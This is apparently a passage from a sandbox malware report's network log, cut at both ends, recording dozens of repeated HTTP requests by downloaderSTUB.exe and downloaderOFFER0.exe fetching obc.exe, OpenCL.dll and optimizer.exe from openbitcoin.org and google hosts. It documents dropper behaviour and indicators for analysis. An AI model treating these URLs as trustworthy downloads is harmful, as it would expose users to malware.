    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:35 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:35 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:35 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:36 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:36 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:36 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 61
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 59
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:36 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:38 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 60
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 64
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:41 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:41 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:41 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:41 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:44 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:00:44 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 65
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 66
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 66
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 66
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 66
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 66
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 66
  • flag-gb
    GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
